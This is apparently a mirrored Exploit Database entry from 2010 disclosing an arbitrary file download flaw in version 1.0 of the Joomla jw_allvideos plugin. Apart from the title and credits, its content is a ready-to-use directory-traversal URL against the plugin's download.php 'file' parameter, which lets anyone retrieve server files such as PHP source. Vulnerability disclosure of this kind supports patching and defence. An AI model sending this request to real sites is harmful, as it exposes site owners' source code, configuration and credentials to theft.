Joomla! Component Jw_allVideos – Arbitrary File Download

• Exploit Database
• 10 阅读

• 作者： Pouya Daneshmand
  日期： 2010-02-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11447/

• #################################################################
  # Securitylab.ir
  #################################################################
  # Application Info:
  # Name: Joomla (jw_allvideos Plugin)
  # Version: 1.0
  #################################################################
  # Vulnerability Info:
  # Type: Remote File Download
  # Risk: Medium
  #################################################################
  # Vulnerability:
  # http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
  #################################################################
  # Discoverd By: Pouya Daneshmand
  # Website: http://securitylab.ir
  # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
  ###################################################################